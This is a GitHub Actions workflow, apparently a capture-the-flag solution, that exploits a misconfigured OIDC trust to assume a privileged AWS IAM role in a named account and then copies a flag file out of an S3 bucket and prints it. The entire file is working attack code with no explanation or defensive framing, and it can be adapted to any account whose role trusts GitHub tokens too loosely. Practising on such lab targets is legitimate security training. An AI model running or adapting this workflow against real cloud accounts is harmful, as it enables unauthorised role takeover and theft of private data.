name: OIDC Exploit Flag Theft

on:
  push:
    branches: [ main ] 
  workflow_dispatch:

permissions:
  id-token: write 
  contents: read

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
    
    - name: Checkout Repository
      uses: actions/checkout@v3

    - name: Configure AWS credentials via OIDC (Assume Role)
      uses: aws-actions/configure-aws-credentials@v4
      with:
        role-to-assume: "arn:aws:iam::694502195928:role/admin-godmode-flag-reader-lol-698875" 
        role-session-name: AttackerSession-${{ github.run_id }}
        aws-region: "ap-southeast-1"
        
    - name: Get and Print the Flag using AWS CLI
      run: |
        aws s3 cp s3://oh-i-really-do-care/flag.txt flag.txt --region ap-southeast-1
        echo "--- FLAG CONTENT (Mission Complete) ---"
        cat flag.txt
        echo "-------------------------------------"

